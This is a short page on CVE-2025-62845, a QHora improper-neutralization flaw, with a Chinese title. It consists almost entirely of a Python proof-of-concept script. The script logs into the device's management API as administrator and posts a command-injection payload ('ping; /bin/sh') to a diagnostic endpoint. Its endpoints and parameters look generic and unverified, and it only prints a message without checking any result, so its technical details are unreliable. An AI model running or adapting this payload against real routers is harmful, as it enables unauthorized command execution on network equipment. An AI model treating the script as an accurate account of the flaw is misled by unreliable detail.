CVE-2025-62845 QHora不当清理漏洞

import requests # Exploit Title: QHora Improper Neutralization PoC # Description: This script demonstrates sending a payload to a vulnerable endpoint. # Note: Requires Administrator credentials and local network access. target_url = "http://<TARGET_IP>/cgi-bin/api/qmanage" session = requests.Session() # 1. Authenticate as Administrator (Prerequisite) login_data = {"user": "admin", "pwd": "password"} session.post(target_url + "/login", data=login_data) # 2. Send malicious payload with escape sequences # Example payload injecting a command separator or control char payload = { "cmd": "ping; /bin/sh", # Improperly neutralized sequence "arg": "127.0.0.1" } response = session.post(target_url + "/system/diagnostic", json=payload) if response.status_code == 200: print("Payload sent successfully. Check system behavior.") else: print("Failed to send payload.")